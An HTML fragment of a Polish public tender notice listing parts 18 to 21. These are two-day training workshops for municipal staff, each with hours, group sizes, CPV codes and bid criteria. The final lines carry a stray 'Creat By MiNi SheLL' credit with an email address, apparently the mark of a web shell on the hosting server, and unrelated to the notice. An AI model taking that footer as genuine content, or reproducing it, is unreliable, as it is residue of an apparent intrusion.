1.3.	Ilość godzin teoretycznych: 13 godzin
1.4.	Ilość godzin praktycznych: 3 godziny
1.5.	Ilość uczestników: 12 osób/grupę.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2, 80.51.10.00-9, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 20</li>
<li>3. Koncepcja realizacji zamówienia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Realizacja 2-dniowego warsztatu pt.Profesjonalna obsługa klienta w urzędzie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	CZAS TRWANIA KURSU/SZKOLENIA I SPOSÓB ORGANIZACJI SZKOLENIA WARSZTATOWEGO:
1.1.	Ilość godzin szkoleniowych: 16
1.2.	Częstotliwość zajęć: 
1.2.1.	2  dni szkoleniowe w trybie ciągłym
1.3.	Ilość godzin teoretycznych:  5 godzin
1.4.	Ilość godzin praktycznych:   11 godzin
1.5.	Ilość uczestników: 12 osób/grupę
l.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2, 80.51.10.00-9, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 20</li>
<li>3. Koncepcja realizacji zamówienia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Realizacja 2-dniowego warsztatu pt.Efektywna komunikacja interpersonalna..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	CZAS TRWANIA KURSU/SZKOLENIA I SPOSÓB ORGANIZACJI SZKOLENIA WARSZTATOWEGO:
1.1.	Ilość godzin szkoleniowych: 16
1.2.	Częstotliwość zajęć: 
1.2.1.	2  dni szkoleniowe w trybie ciągłym
1.3.	Ilość godzin teoretycznych: 5,5 godzin
1.4.	Ilość godzin praktycznych: 10,5 godzin
1.5.	Ilość uczestników: 12 osób/grupę.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2, 80.51.10.00-9, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 20</li>
<li>3. Koncepcja realizacji zamówienia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Realizacja 2-dniowego szkolenia pt. Zasady prowadzenia marketingu regionalnego w administracji samorządowej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	CZAS TRWANIA SZKOLENIA I SPOSÓB ORGANIZACJI SZKOLENIA:
1.1.	Ilość godzin szkoleniowych: 16
1.2.	Częstotliwość zajęć: 
1.2.1.	2 dni szkoleniowych ciągłych
1.3.	Ilość godzin teoretycznych: 9,5 godziny
1.4.	Ilość godzin praktycznych: 6,5 godziny
1.5.	Ilość uczestników: 12 osób/grupę
l.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2, 80.51.10.00-9, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 20</li>
<li>3. Koncepcja realizacji zamówienia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Realizacja 2-dniowego szkolenia pt. Zasady ogłaszania aktów prawa miejscowego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	CZAS TRWANIA KURSU/SZKOLENIA I SPOSÓB ORGANIZACJI SZKOLENIA:
1.1.	Ilość godzin szkoleniowych: 16
1.2.	Częstotliwość zajęć: 
1.2.1.	2  dni szkoleniowe w trybie ciągłym
1.3.	Ilość godzin teoretycznych: 10 godzin
1.4.	Ilość godzin praktycznych: 6 godzin
1.5.	Ilość uczestników: 12 osób/grupę.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2, 80.51.10.00-9, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 20</li>
<li>3. Koncepcja realizacji zamówienia - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com